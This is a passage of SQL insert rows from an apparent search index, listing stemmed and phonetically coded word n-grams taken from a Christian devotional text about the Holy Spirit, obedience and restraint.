(326351, 'normal life he', 'normal life he', 0, 1, 1.4667, 'N6541', 1, '*'),
(326352, 'not a thing', 'not a thing', 0, 1, 1.3667, 'N352', 1, '*'),
(326353, 'not always', 'not always', 0, 1, 1.3333, 'N342', 1, '*'),
(326354, 'not always strive', 'not always strive', 0, 1, 1.5667, 'N342361', 1, '*'),
(326355, 'not attack', 'not attack', 0, 1, 1.3333, 'N320', 1, '*'),
(326356, 'not attack spiritual', 'not attack spiritual', 0, 1, 1.6667, 'N321634', 1, '*'),
(326357, 'not belittle', 'not belittle', 0, 1, 1.4, 'N31434', 1, '*'),
(326358, 'not belittle him', 'not belittle him', 0, 1, 1.5333, 'N314345', 1, '*'),
(326359, 'not disobey', 'not disobey', 0, 1, 1.3667, 'N321', 1, '*'),
(326360, 'not disobey him', 'not disobey him', 0, 1, 1.5, 'N3215', 1, '*'),
(326361, 'not disobey the', 'not disobey the', 0, 1, 1.5, 'N3213', 1, '*'),
(326362, 'not ignore', 'not ignore', 0, 1, 1.3333, 'N3256', 1, '*'),
(326363, 'not ignore him', 'not ignore him', 0, 1, 1.4667, 'N32565', 1, '*'),
(326364, 'not join', 'not join', 0, 1, 1.2667, 'N325', 1, '*'),
(326365, 'not join people', 'not join people', 0, 1, 1.5, 'N32514', 1, '*'),
(326366, 'not recover', 'not recover', 0, 1, 1.3667, 'N36216', 1, '*'),
(326367, 'not recover from', 'not recover from', 0, 1, 1.5333, 'N36216165', 1, '*'),
(326368, 'not strive', 'not strive', 0, 1, 1.3333, 'N32361', 1, '*'),
(326369, 'not strive with', 'not strive with', 0, 1, 1.5, 'N323613', 1, '*'),
(326370, 'not the holy', 'not the holy', 0, 1, 1.4, 'N340', 1, '*'),
(326371, 'not to go', 'not to go', 0, 1, 1.3, 'N320', 1, '*'),
(326372, 'not trivialize', 'not trivialize', 0, 1, 1.4667, 'N36142', 1, '*'),
(326373, 'not trivialize his', 'not trivialize his', 0, 1, 1.6, 'N36142', 1, '*'),
(326374, 'not willfully', 'not willfully', 0, 1, 1.4333, 'N3414', 1, '*'),
(326375, 'not willfully or', 'not willfully or', 0, 1, 1.5333, 'N34146', 1, '*'),
(326376, 'note of these', 'note of these', 0, 1, 1.4333, 'N3132', 1, '*'),
(326377, 'obey him', 'obei him', 0, 1, 1.2667, 'O150', 1, '*'),
(326378, 'obey him i', 'obei him i', 0, 1, 1.3333, 'O150', 1, '*'),
(326379, 'of action', 'of action', 0, 1, 1.3, 'O1235', 1, '*'),
(326380, 'of action constraint', 'of action constraint', 0, 1, 1.6667, 'O12352523653', 1, '*'),
(326381, 'of call', 'of call', 0, 1, 1.2333, 'O124', 1, '*'),
(326382, 'of call in', 'of call in', 0, 1, 1.3333, 'O1245', 1, '*'),
(326383, 'of god whereby', 'of god whereby', 0, 1, 1.4667, 'O12361', 1, '*'),
(326384, 'of israel did', 'of israel did', 0, 1, 1.4333, 'O12643', 1, '*'),
(326385, 'of jesus in', 'of jesus in', 0, 1, 1.3667, 'O125', 1, '*'),
(326386, 'of life 7', 'of life 7', 0, 1, 1.3, 'O141', 1, '*'),
(326387, 'of life don\'t', 'of life don', 0, 1, 1.4333, 'O141353', 1, '*'),
(326388, 'of pain', 'of pain', 0, 1, 1.2333, 'O150', 1, '*'),
(326389, 'of pain constraint', 'of pain constraint', 0, 1, 1.6, 'O152523653', 1, '*'),
(326390, 'of redemption.”', 'of redemption.”', 0, 1, 1.5, 'O1635135', 1, '*'),
(326391, 'of redemption.” avoid', 'of redemption.” avoid', 0, 1, 1.7, 'O163513513', 1, '*'),
(326392, 'of relationship', 'of relationship', 0, 1, 1.5, 'O1643521', 1, '*'),
(326393, 'of relationship with', 'of relationship with', 0, 1, 1.6667, 'O16435213', 1, '*'),
(326394, 'of taking the', 'of taking the', 0, 1, 1.4333, 'O132523', 1, '*'),
(326395, 'of the activities', 'of the activities', 0, 1, 1.5667, 'O1323132', 1, '*'),
(326396, 'of the bible', 'of the bible', 0, 1, 1.4, 'O1314', 1, '*'),
(326397, 'of the exceeding', 'of the exceeding', 0, 1, 1.5333, 'O132352', 1, '*'),
(326398, 'of these will', 'of these will', 0, 1, 1.4333, 'O1324', 1, '*'),
(326399, 'once the problem', 'onc the problem', 0, 1, 1.5333, 'O52316145', 1, '*'),
(326400, 'once you break', 'onc you break', 0, 1, 1.4667, 'O52162', 1, '*'),
(326401, 'one\'s freedom', 'on freedom', 0, 1, 1.4333, 'O521635', 1, '*'),
(326402, 'one\'s freedom of', 'on freedom of', 0, 1, 1.5333, 'O5216351', 1, '*'),
(326403, 'only refreshed', 'onli refreshed', 0, 1, 1.4667, 'O5461623', 1, '*'),
(326404, 'only refreshed when', 'onli refreshed when', 0, 1, 1.6333, 'O54616235', 1, '*'),
(326405, 'only when', 'onli when', 0, 1, 1.3, 'O545', 1, '*'),
(326406, 'only when they', 'onli when they', 0, 1, 1.4667, 'O5453', 1, '*'),
(326407, 'operating', 'oper', 0, 0, 0.6, 'O16352', 1, '*'),
(326408, 'operating under', 'oper under', 0, 1, 1.5, 'O16352536', 1, '*'),
(326409, 'operating under the', 'oper under the', 0, 1, 1.6333, 'O163525363', 1, '*'),
(326410, 'operation you', 'oper you', 0, 1, 1.4333, 'O1635', 1, '*'),
(326411, 'operation you must', 'oper you must', 0, 1, 1.6, 'O163523', 1, '*'),
(326412, 'operations in', 'oper in', 0, 1, 1.4333, 'O163525', 1, '*'),
(326413, 'operations in you', 'oper in you', 0, 1, 1.5667, 'O163525', 1, '*'),
(326414, 'or an', 'or an', 0, 1, 1.1667, 'O650', 1, '*'),
(326415, 'or an influence', 'or an influence', 0, 1, 1.5, 'O651452', 1, '*'),
(326416, 'or by', 'or by', 0, 1, 1.1667, 'O610', 1, '*'),
(326417, 'or by strong', 'or by strong', 0, 1, 1.4, 'O6123652', 1, '*'),
(326418, 'or knowingly', 'or knowingly', 0, 1, 1.4, 'O62524', 1, '*'),
(326419, 'or knowingly disobey', 'or knowingly disobey', 0, 1, 1.6667, 'O62524321', 1, '*'),
(326420, 'or through you', 'or through you', 0, 1, 1.4667, 'O6362', 1, '*'),
(326421, 'or win', 'or win', 0, 1, 1.2, 'O650', 1, '*'),
(326422, 'or win to', 'or win to', 0, 1, 1.3, 'O653', 1, '*'),
(326423, 'other things and', 'other things and', 0, 1, 1.5333, 'O3635253', 1, '*'),
(326424, 'out let', 'out let', 0, 1, 1.2333, 'O343', 1, '*'),
(326425, 'out let the', 'out let the', 0, 1, 1.3667, 'O343', 1, '*'),
(326426, 'pain constraint', 'pain constraint', 0, 1, 1.5, 'P52523653', 1, '*'),
(326427, 'pain constraint means', 'pain constraint means', 0, 1, 1.7, 'P5252365352', 1, '*'),
(326428, 'people to attack', 'peopl to attack', 0, 1, 1.5333, 'P432', 1, '*'),
(326429, 'person calling', 'person calling', 0, 1, 1.4667, 'P6252452', 1, '*'),
(326430, 'person calling him', 'person calling him', 0, 1, 1.6, 'P62524525', 1, '*'),
(326431, 'person stop', 'person stop', 0, 1, 1.3667, 'P625231', 1, '*'),
(326432, 'person stop trivializing', 'person stop trivializing', 0, 1, 1.8, 'P6252313614252', 1, '*'),
(326433, 'personality', 'person', 0, 0, 0.7333, 'P62543', 1, '*'),
(326434, 'personality stop', 'person stop', 0, 1, 1.5333, 'P62543231', 1, '*'),
(326435, 'personality stop saying', 'person stop saying', 0, 1, 1.7667, 'P62543231252', 1, '*'),
(326436, 'persuasion', 'persuas', 0, 0, 0.6667, 'P625', 1, '*'),
(326437, 'persuasion that', 'persuas that', 0, 1, 1.5, 'P6253', 1, '*'),
(326438, 'persuasion that is', 'persuas that is', 0, 1, 1.6, 'P62532', 1, '*'),
(326439, 'place of jesus', 'place of jesus', 0, 1, 1.4667, 'P4212', 1, '*'),
(326440, 'plague activities', 'plagu activities', 0, 1, 1.5667, 'P423132', 1, '*'),
(326441, 'plague activities that', 'plagu activities that', 0, 1, 1.7333, 'P4231323', 1, '*'),
(326442, 'point of call', 'point of call', 0, 1, 1.4333, 'P53124', 1, '*'),
(326443, 'possible for your', 'possibl for your', 0, 1, 1.5667, 'P21416', 1, '*'),
(326444, 'practice to', 'practic to', 0, 1, 1.3667, 'P62323', 1, '*'),
(326445, 'practice to obey', 'practic to obey', 0, 1, 1.5333, 'P623231', 1, '*'),
(326446, 'preparing for', 'prepar for', 0, 1, 1.4333, 'P6165216', 1, '*'),
(326447, 'preparing for a', 'prepar for a', 0, 1, 1.5, 'P6165216', 1, '*'),
(326448, 'pressure not', 'pressur not', 0, 1, 1.4, 'P62653', 1, '*'),
(326449, 'pressure not to', 'pressur not to', 0, 1, 1.5, 'P62653', 1, '*'),
(326450, 'pressure to', 'pressur to', 0, 1, 1.3667, 'P6263', 1, '*'),
(326451, 'pressure to go', 'pressur to go', 0, 1, 1.4667, 'P62632', 1, '*'),
(326452, 'problem is solved', 'problem is solved', 0, 1, 1.5667, 'P61452413', 1, '*'),
(326453, 'problems and once', 'problem and once', 0, 1, 1.5667, 'P614525352', 1, '*'),
(326454, 'realms of', 'realm of', 0, 1, 1.3, 'R4521', 1, '*'),
(326455, 'realms of the', 'realm of the', 0, 1, 1.4333, 'R45213', 1, '*'),
(326456, 'recover from', 'recov from', 0, 1, 1.4, 'R216165', 1, '*'),
(326457, 'recover from it', 'recov from it', 0, 1, 1.5, 'R2161653', 1, '*'),
(326458, 'recreated', 'recreat', 0, 0, 0.6, 'R263', 1, '*'),
(326459, 'recreated and', 'recreat and', 0, 1, 1.4333, 'R26353', 1, '*'),
(326460, 'recreated and renewed', 'recreat and renewed', 0, 1, 1.7, 'R26353653', 1, '*'),
(326461, 'redemption.”', 'redemption.”', 0, 0, 0.8, 'R35135', 1, '*'),
(326462, 'redemption.” avoid', 'redemption.” avoid', 0, 1, 1.6, 'R3513513', 1, '*'),
(326463, 'redemption.” avoid like', 'redemption.” avoid like', 0, 1, 1.7667, 'R351351342', 1, '*'),
(326464, 'refreshed', 'refresh', 0, 0, 0.6, 'R1623', 1, '*'),
(326465, 'refreshed when', 'refresh when', 0, 1, 1.4667, 'R16235', 1, '*'),
(326466, 'refreshed when you', 'refresh when you', 0, 1, 1.6, 'R16235', 1, '*'),
(326467, 'relationship safe', 'relationship safe', 0, 1, 1.5667, 'R4352121', 1, '*'),
(326468, 'relationship safe with', 'relationship safe with', 0, 1, 1.7333, 'R43521213', 1, '*'),
(326469, 'relationship with the', 'relationship with the', 0, 1, 1.7, 'R435213', 1, '*'),
(326470, 'render', 'render', 0, 0, 0.4, 'R536', 1, '*'),
(326471, 'render constraint', 'render constraint', 0, 1, 1.5667, 'R5362523653', 1, '*'),
(326472, 'render constraint as', 'render constraint as', 0, 1, 1.6667, 'R53625236532', 1, '*'),
(326473, 'renewed', 'renew', 0, 0, 0.4667, 'R530', 1, '*'),
(326474, 'renewed person', 'renew person', 0, 1, 1.4667, 'R531625', 1, '*'),
(326475, 'renewed person stop', 'renew person stop', 0, 1, 1.6333, 'R531625231', 1, '*'),
(326476, 'resources you', 'resourc you', 0, 1, 1.4333, 'R262', 1, '*'),
(326477, 'resources you need', 'resourc you need', 0, 1, 1.6, 'R26253', 1, '*'),
(326478, 'restraint', 'restraint', 0, 0, 0.6, 'R23653', 1, '*'),
(326479, 'restraint ignoring', 'restraint ignoring', 0, 1, 1.6, 'R2365325652', 1, '*'),
(326480, 'restraint ignoring this', 'restraint ignoring this', 0, 1, 1.7667, 'R236532565232', 1, '*'),
(326481, 'restraint is', 'restraint is', 0, 1, 1.4, 'R236532', 1, '*'),
(326482, 'restraint is an', 'restraint is an', 0, 1, 1.5, 'R2365325', 1, '*'),
(326483, 'return back', 'return back', 0, 1, 1.3667, 'R36512', 1, '*'),
(326484, 'return back to', 'return back to', 0, 1, 1.4667, 'R365123', 1, '*'),
(326485, 'right to', 'right to', 0, 1, 1.2667, 'R230', 1, '*'),
(326486, 'right to walk', 'right to walk', 0, 1, 1.4333, 'R2342', 1, '*'),
(326487, 'safe as', 'safe as', 0, 1, 1.2333, 'S120', 1, '*'),
(326488, 'safe as you', 'safe as you', 0, 1, 1.3667, 'S120', 1, '*'),
(326489, 'safe with', 'safe with', 0, 1, 1.3, 'S130', 1, '*'),
(326490, 'safe with the', 'safe with the', 0, 1, 1.4333, 'S130', 1, '*'),
(326491, 'said my', 'said my', 0, 1, 1.2333, 'S350', 1, '*'),
(326492, 'said my spirit', 'said my spirit', 0, 1, 1.4667, 'S352163', 1, '*'),
(326493, 'said who', 'said who', 0, 1, 1.2667, 'S300', 1, '*'),
(326494, 'said who will', 'said who will', 0, 1, 1.4333, 'S340', 1, '*'),
(326495, 'sam 15', 'sam 15', 0, 1, 1.2, 'S500', 1, '*'),
(326496, 'sam 15 10-23', 'sam 15 10-23', 0, 1, 1.4, 'S500', 1, '*'),
(326497, 'same these', 'same these', 0, 1, 1.3333, 'S532', 1, '*'),
(326498, 'same these are', 'same these are', 0, 1, 1.4667, 'S5326', 1, '*'),
(326499, 'saul the', 'saul the', 0, 1, 1.2667, 'S430', 1, '*'),
(326500, 'saul the king', 'saul the king', 0, 1, 1.4333, 'S43252', 1, '*'),
(326501, 'saying something', 'sai something', 0, 1, 1.5333, 'S525352', 1, '*'),
(326502, 'saying something tells', 'sai something tells', 0, 1, 1.7333, 'S525352342', 1, '*'),
(326503, 'says and grieve', 'sai and grieve', 0, 1, 1.5, 'S53261', 1, '*'),
(326504, 'says “and', 'sai “and', 0, 1, 1.3, 'S530', 1, '*'),
(326505, 'says “and the', 'sai “and the', 0, 1, 1.4333, 'S530', 1, '*'),
(326506, 'sealed unto', 'seal unto', 0, 1, 1.3667, 'S4353', 1, '*'),
(326507, 'sealed unto the', 'seal unto the', 0, 1, 1.5, 'S4353', 1, '*'),
(326508, 'shall not always', 'shall not always', 0, 1, 1.5333, 'S45342', 1, '*'),
(326509, 'should lose', 'should lose', 0, 1, 1.3667, 'S4342', 1, '*'),
(326510, 'should lose to', 'should lose to', 0, 1, 1.4667, 'S43423', 1, '*'),
(326511, 'show you today', 'show you today', 0, 1, 1.4667, 'S300', 1, '*'),
(326512, 'signals to', 'signal to', 0, 1, 1.3333, 'S5423', 1, '*'),
(326513, 'signals to you', 'signal to you', 0, 1, 1.4667, 'S5423', 1, '*'),
(326514, 'situation of', 'situat of', 0, 1, 1.4, 'S351', 1, '*'),
(326515, 'situation of life', 'situat of life', 0, 1, 1.5667, 'S35141', 1, '*'),
(326516, 'so don\'t do', 'so don do', 0, 1, 1.3667, 'S353', 1, '*'),
(326517, 'solved they', 'solv they', 0, 1, 1.3667, 'S413', 1, '*'),
(326518, 'solved they return', 'solv they return', 0, 1, 1.6, 'S4136365', 1, '*'),
(326519, 'some don\'ts', 'some don', 0, 1, 1.3667, 'S53532', 1, '*'),
(326520, 'some don\'ts of', 'some don of', 0, 1, 1.4667, 'S535321', 1, '*'),
(326521, 'some versions', 'some versions', 0, 1, 1.4333, 'S516252', 1, '*'),
(326522, 'some versions of', 'some versions of', 0, 1, 1.5333, 'S5162521', 1, '*'),
(326523, 'somebody do', 'somebodi do', 0, 1, 1.3667, 'S513', 1, '*'),
(326524, 'somebody do something', 'somebodi do something', 0, 1, 1.7, 'S51325352', 1, '*'),
(326525, 'someone is', 'someon is', 0, 1, 1.3333, 'S520', 1, '*'),
(326526, 'someone is operating', 'someon is operating', 0, 1, 1.6667, 'S5216352', 1, '*'),
(326527, 'something by', 'someth by', 0, 1, 1.4, 'S53521', 1, '*'),
(326528, 'something by force', 'someth by force', 0, 1, 1.6, 'S5352162', 1, '*'),
(326529, 'something or', 'someth or', 0, 1, 1.4, 'S53526', 1, '*'),
(326530, 'something or an', 'someth or an', 0, 1, 1.5, 'S535265', 1, '*'),
(326531, 'something restraint', 'someth restraint', 0, 1, 1.6333, 'S5352623653', 1, '*'),
(326532, 'something restraint is', 'someth restraint is', 0, 1, 1.7333, 'S53526236532', 1, '*'),
(326533, 'something tells', 'someth tells', 0, 1, 1.5, 'S5352342', 1, '*'),
(326534, 'something tells me', 'someth tells me', 0, 1, 1.6, 'S53523425', 1, '*'),
(326535, 'something that limits', 'someth that limits', 0, 1, 1.7, 'S535234532', 1, '*'),
(326536, 'spare-tyre', 'spare-tyr', 0, 0, 0.6667, 'S1636', 1, '*'),
(326537, 'spare-tyre don\'t', 'spare-tyr don', 0, 1, 1.5333, 'S1636353', 1, '*'),
(326538, 'spare-tyre don\'t have', 'spare-tyr don have', 0, 1, 1.7, 'S16363531', 1, '*'),
(326539, 'spirit 1 don\'t', 'spirit 1 don', 0, 1, 1.4667, 'S16353', 1, '*'),
(326540, 'spirit 3', 'spirit 3', 0, 1, 1.2667, 'S163', 1, '*'),
(326541, 'spirit 3 don\'t', 'spirit 3 don', 0, 1, 1.4667, 'S16353', 1, '*'),
(326542, 'spirit 6', 'spirit 6', 0, 1, 1.2667, 'S163', 1, '*'),
(326543, 'spirit 6 don\'t', 'spirit 6 don', 0, 1, 1.4667, 'S16353', 1, '*'),
(326544, 'spirit a', 'spirit a', 0, 1, 1.2667, 'S163', 1, '*'),
(326545, 'spirit a time', 'spirit a time', 0, 1, 1.4333, 'S1635', 1, '*'),
(326546, 'spirit and eventually', 'spirit and eventually', 0, 1, 1.7, 'S163531534', 1, '*'),
(326547, 'spirit and i', 'spirit and i', 0, 1, 1.4, 'S16353', 1, '*'),
(326548, 'spirit be', 'spirit be', 0, 1, 1.3, 'S1631', 1, '*'),
(326549, 'spirit be your', 'spirit be your', 0, 1, 1.4667, 'S16316', 1, '*'),
(326550, 'spirit constrains', 'spirit constrains', 0, 1, 1.5667, 'S1632523652', 1, '*'),
(326551, 'spirit constrains you', 'spirit constrains you', 0, 1, 1.7, 'S1632523652', 1, '*'),
(326552, 'spirit contacts', 'spirit contacts', 0, 1, 1.5, 'S163253232', 1, '*'),
(326553, 'spirit contacts us', 'spirit contacts us', 0, 1, 1.6, 'S163253232', 1, '*'),
(326554, 'spirit for', 'spirit for', 0, 1, 1.3333, 'S16316', 1, '*'),
(326555, 'spirit for granted', 'spirit for granted', 0, 1, 1.6, 'S163162653', 1, '*'),
(326556, 'spirit is not', 'spirit is not', 0, 1, 1.4333, 'S163253', 1, '*'),
(326557, 'spirit is preparing', 'spirit is preparing', 0, 1, 1.6333, 'S1632161652', 1, '*'),
(326558, 'spirit of god', 'spirit of god', 0, 1, 1.4333, 'S163123', 1, '*'),
(326559, 'spirit operations', 'spirit operations', 0, 1, 1.5667, 'S16316352', 1, '*'),
(326560, 'spirit operations in', 'spirit operations in', 0, 1, 1.6667, 'S163163525', 1, '*'),
(326561, 'spirit saul', 'spirit saul', 0, 1, 1.3667, 'S16324', 1, '*'),
(326562, 'spirit saul the', 'spirit saul the', 0, 1, 1.5, 'S163243', 1, '*'),
(326563, 'spirit shall', 'spirit shall', 0, 1, 1.4, 'S16324', 1, '*'),
(326564, 'spirit shall not', 'spirit shall not', 0, 1, 1.5333, 'S1632453', 1, '*'),
(326565, 'spirit taking', 'spirit taking', 0, 1, 1.4333, 'S163252', 1, '*'),
(326566, 'spirit taking note', 'spirit taking note', 0, 1, 1.6, 'S16325253', 1, '*'),
(326567, 'spirit there are', 'spirit there are', 0, 1, 1.5333, 'S1636', 1, '*'),
(326568, 'spirit to lose', 'spirit to lose', 0, 1, 1.4667, 'S16342', 1, '*'),
(326569, 'spirit will lose', 'spirit will lose', 0, 1, 1.5333, 'S16342', 1, '*'),
(326570, 'spirit wrath', 'spirit wrath', 0, 1, 1.4, 'S16363', 1, '*'),
(326571, 'spirit wrath anger', 'spirit wrath anger', 0, 1, 1.6, 'S16363526', 1, '*'),
(326572, 'spirit you must', 'spirit you must', 0, 1, 1.5, 'S163523', 1, '*'),
(326573, 'spirit-man', 'spirit-man', 0, 0, 0.6667, 'S1635', 1, '*'),
(326574, 'spirit-man 5', 'spirit-man 5', 0, 1, 1.4, 'S1635', 1, '*'),
(326575, 'spirit-man 5 do', 'spirit-man 5 do', 0, 1, 1.5, 'S16353', 1, '*'),
(326576, 'spirit-man to', 'spirit-man to', 0, 1, 1.4333, 'S16353', 1, '*'),
(326577, 'spirit-man to compel', 'spirit-man to compel', 0, 1, 1.6667, 'S163532514', 1, '*'),
(326578, 'spiritual authorities', 'spiritu authorities', 0, 1, 1.7, 'S16343632', 1, '*'),
(326579, 'spiritual authorities david', 'spiritu authorities david', 0, 1, 1.9, 'S16343632313', 1, '*'),
(326580, 'spiritual authorities it', 'spiritu authorities it', 0, 1, 1.8, 'S163436323', 1, '*'),
(326581, 'stand the', 'stand the', 0, 1, 1.3, 'S353', 1, '*'),
(326582, 'stand the consequence', 'stand the consequence', 0, 1, 1.7, 'S35325252', 1, '*'),
(326583, 'stop saying', 'stop saying', 0, 1, 1.3667, 'S31252', 1, '*'),
(326584, 'stop saying something', 'stop saying something', 0, 1, 1.7, 'S312525352', 1, '*'),
(326585, 'stop trivializing', 'stop trivializing', 0, 1, 1.5667, 'S313614252', 1, '*'),
(326586, 'stop trivializing divine', 'stop trivializing divine', 0, 1, 1.8, 'S313614252315', 1, '*'),
(326587, 'strive', 'strive', 0, 0, 0.4, 'S361', 1, '*'),
(326588, 'strive with', 'strive with', 0, 1, 1.3667, 'S3613', 1, '*'),
(326589, 'strive with him', 'strive with him', 0, 1, 1.5, 'S36135', 1, '*'),
(326590, 'strive with man', 'strive with man', 0, 1, 1.5, 'S36135', 1, '*'),
(326591, 'strives', 'strive', 0, 0, 0.4667, 'S3612', 1, '*'),
(326592, 'strives with', 'strive with', 0, 1, 1.4, 'S36123', 1, '*'),
(326593, 'strives with the', 'strive with the', 0, 1, 1.5333, 'S36123', 1, '*'),
(326594, 'strong inner', 'strong inner', 0, 1, 1.4, 'S365256', 1, '*'),
(326595, 'strong inner pressure', 'strong inner pressure', 0, 1, 1.7, 'S3652561626', 1, '*'),
(326596, 'strong persuasion', 'strong persuasion', 0, 1, 1.5667, 'S36521625', 1, '*'),
(326597, 'strong persuasion that', 'strong persuasion that', 0, 1, 1.7333, 'S365216253', 1, '*'),
(326598, 'sugar-daddy', 'sugar-daddi', 0, 0, 0.7333, 'S630', 1, '*'),
(326599, 'sugar-daddy kind', 'sugar-daddi kind', 0, 1, 1.5333, 'S63253', 1, '*'),
(326600, 'sugar-daddy kind of', 'sugar-daddi kind of', 0, 1, 1.6333, 'S632531', 1, '*'),
(326601, 'take him', 'take him', 0, 1, 1.2667, 'T250', 1, '*'),
(326602, 'take him for', 'take him for', 0, 1, 1.4, 'T2516', 1, '*'),
(326603, 'take the place', 'take the place', 0, 1, 1.4667, 'T23142', 1, '*'),
(326604, 'taking note', 'take note', 0, 1, 1.3667, 'T25253', 1, '*'),
(326605, 'taking note of', 'take note of', 0, 1, 1.4667, 'T252531', 1, '*'),
(326606, 'taking the', 'take the', 0, 1, 1.3333, 'T2523', 1, '*'),
(326607, 'taking the holy', 'take the holy', 0, 1, 1.5, 'T25234', 1, '*'),
(326608, 'tells me', 'tell me', 0, 1, 1.2667, 'T425', 1, '*'),
(326609, 'tells me to', 'tell me to', 0, 1, 1.3667, 'T4253', 1, '*'),
(326610, 'that happens', 'that happens', 0, 1, 1.4, 'T152', 1, '*'),
(326611, 'that happens disaster', 'that happens disaster', 0, 1, 1.7, 'T1523236', 1, '*'),
(326612, 'that i will', 'that i will', 0, 1, 1.3667, 'T400', 1, '*'),
(326613, 'that is something', 'that is something', 0, 1, 1.5667, 'T25352', 1, '*'),
(326614, 'that keep', 'that keep', 0, 1, 1.3, 'T210', 1, '*'),
(326615, 'that keep your', 'that keep your', 0, 1, 1.4667, 'T216', 1, '*'),
(326616, 'that limits', 'that limits', 0, 1, 1.3667, 'T4532', 1, '*'),
(326617, 'that limits one\'s', 'that limits one', 0, 1, 1.5667, 'T453252', 1, '*'),
(326618, 'that till', 'that till', 0, 1, 1.3, 'T400', 1, '*'),
(326619, 'that till date', 'that till date', 0, 1, 1.4667, 'T430', 1, '*'),
(326620, 'that want', 'that want', 0, 1, 1.3, 'T530', 1, '*'),
(326621, 'that want to', 'that want to', 0, 1, 1.4, 'T530', 1, '*'),
(326622, 'the activities', 'the activities', 0, 1, 1.4667, 'T23132', 1, '*'),
(326623, 'the activities that', 'the activities that', 0, 1, 1.6333, 'T231323', 1, '*'),
(326624, 'the affairs', 'the affairs', 0, 1, 1.3667, 'T162', 1, '*'),
(326625, 'the affairs of', 'the affairs of', 0, 1, 1.4667, 'T1621', 1, '*'),
(326626, 'the anointing be', 'the anointing be', 0, 1, 1.5333, 'T53521', 1, '*'),
(326627, 'the bible render', 'the bible render', 0, 1, 1.5333, 'T146536', 1, '*'),
(326628, 'the consequence', 'the consequence', 0, 1, 1.5, 'T25252', 1, '*'),
(326629, 'the consequence of', 'the consequence of', 0, 1, 1.6, 'T252521', 1, '*'),
(326630, 'the day of', 'the day of', 0, 1, 1.3333, 'T100', 1, '*'),
(326631, 'the end 10', 'the end 10', 0, 1, 1.3333, 'T530', 1, '*'),
(326632, 'the exceeding', 'the exceeding', 0, 1, 1.4333, 'T2352', 1, '*'),
(326633, 'the exceeding abundantly', 'the exceeding abundantly', 0, 1, 1.8, 'T2352153534', 1, '*'),
(326634, 'the instructions of', 'the instructions of', 0, 1, 1.6333, 'T523623521', 1, '*'),
(326635, 'the king of', 'the king of', 0, 1, 1.3667, 'T2521', 1, '*'),
(326636, 'the lord\'s anointed', 'the lord anointed', 0, 1, 1.6333, 'T463253', 1, '*'),
(326637, 'the other things', 'the other things', 0, 1, 1.5333, 'T6352', 1, '*'),
(326638, 'the realms', 'the realms', 0, 1, 1.3333, 'T6452', 1, '*'),
(326639, 'the realms of', 'the realms of', 0, 1, 1.4333, 'T64521', 1, '*'),
(326640, 'the resources you', 'the resources you', 0, 1, 1.5667, 'T6262', 1, '*'),
(326641, 'the same these', 'the same these', 0, 1, 1.4667, 'T2532', 1, '*'),
(326642, 'the signals', 'the signals', 0, 1, 1.3667, 'T2542', 1, '*'),
(326643, 'the signals to', 'the signals to', 0, 1, 1.4667, 'T25423', 1, '*'),
(326644, 'the spirit constrains', 'the spirit constrains', 0, 1, 1.7, 'T21632523652', 1, '*'),
(326645, 'the ways by', 'the ways by', 0, 1, 1.3667, 'T210', 1, '*'),
(326646, 'their former', 'their former', 0, 1, 1.4, 'T61656', 1, '*'),
(326647, 'their former way', 'their former way', 0, 1, 1.5333, 'T61656', 1, '*'),
(326648, 'there are individuals', 'there are individuals', 0, 1, 1.7, 'T6531342', 1, '*'),
(326649, 'therefore it is', 'therefor it is', 0, 1, 1.5, 'T61632', 1, '*'),
(326650, 'these are decisions', 'these are decisions', 0, 1, 1.6333, 'T263252', 1, '*'),
(326651, 'these will keep', 'these will keep', 0, 1, 1.5, 'T2421', 1, '*'),
(326652, 'they have problems', 'thei have problems', 0, 1, 1.6, 'T161452', 1, '*'),
(326653, 'they return', 'thei return', 0, 1, 1.3667, 'T6365', 1, '*'),
(326654, 'they return back', 'thei return back', 0, 1, 1.5333, 'T636512', 1, '*'),
(326655, 'thing or', 'thing or', 0, 1, 1.2667, 'T526', 1, '*'),
(326656, 'thing or an', 'thing or an', 0, 1, 1.3667, 'T5265', 1, '*'),
(326657, 'things and', 'thing and', 0, 1, 1.3333, 'T5253', 1, '*'),
(326658, 'things and it', 'thing and it', 0, 1, 1.4333, 'T5253', 1, '*'),
(326659, 'this communication', 'thi communication', 0, 1, 1.6, 'T25235', 1, '*'),
(326660, 'this communication of', 'thi communication of', 0, 1, 1.7, 'T252351', 1, '*'),
(326661, 'thisworld', 'thisworld', 0, 0, 0.6, 'T2643', 1, '*'),
(326662, 'thisworld are', 'thisworld are', 0, 1, 1.4333, 'T26436', 1, '*'),
(326663, 'thisworld are 8', 'thisworld are 8', 0, 1, 1.5, 'T26436', 1, '*'),
(326664, 'through constraint', 'through constraint', 0, 1, 1.6, 'T62523653', 1, '*'),
(326665, 'through constraint and', 'through constraint and', 0, 1, 1.7333, 'T6252365353', 1, '*'),
(326666, 'through you holy', 'through you holy', 0, 1, 1.5333, 'T624', 1, '*'),
(326667, 'till date you', 'till date you', 0, 1, 1.4333, 'T430', 1, '*'),
(326668, 'to a divine', 'to a divine', 0, 1, 1.3667, 'T150', 1, '*'),
(326669, 'to attack', 'to attack', 0, 1, 1.3, 'T200', 1, '*'),
(326670, 'to attack spiritual', 'to attack spiritual', 0, 1, 1.6333, 'T21634', 1, '*'),
(326671, 'to come to', 'to come to', 0, 1, 1.3333, 'T253', 1, '*'),
(326672, 'to compel', 'to compel', 0, 1, 1.3, 'T2514', 1, '*'),
(326673, 'to compel you', 'to compel you', 0, 1, 1.4333, 'T2514', 1, '*'),
(326674, 'to go ahead', 'to go ahead', 0, 1, 1.3667, 'T230', 1, '*'),
(326675, 'to god only', 'to god only', 0, 1, 1.3667, 'T2354', 1, '*'),
(326676, 'to grieve', 'to grieve', 0, 1, 1.3, 'T261', 1, '*'),
(326677, 'to grieve the', 'to grieve the', 0, 1, 1.4333, 'T2613', 1, '*'),
(326678, 'to him after', 'to him after', 0, 1, 1.4, 'T5136', 1, '*'),
(326679, 'to lose to', 'to lose to', 0, 1, 1.3333, 'T423', 1, '*'),
(326680, 'to lose when', 'to lose when', 0, 1, 1.4, 'T425', 1, '*'),
(326681, 'to make somebody', 'to make somebody', 0, 1, 1.5333, 'T52513', 1, '*'),
(326682, 'to mention', 'to mention', 0, 1, 1.3333, 'T535', 1, '*'),
(326683, 'to mention a', 'to mention a', 0, 1, 1.4, 'T535', 1, '*'),
(326684, 'to move in', 'to move in', 0, 1, 1.3333, 'T515', 1, '*'),
(326685, 'to obey him', 'to obey him', 0, 1, 1.3667, 'T150', 1, '*'),
(326686, 'to show you', 'to show you', 0, 1, 1.3667, 'T200', 1, '*'),
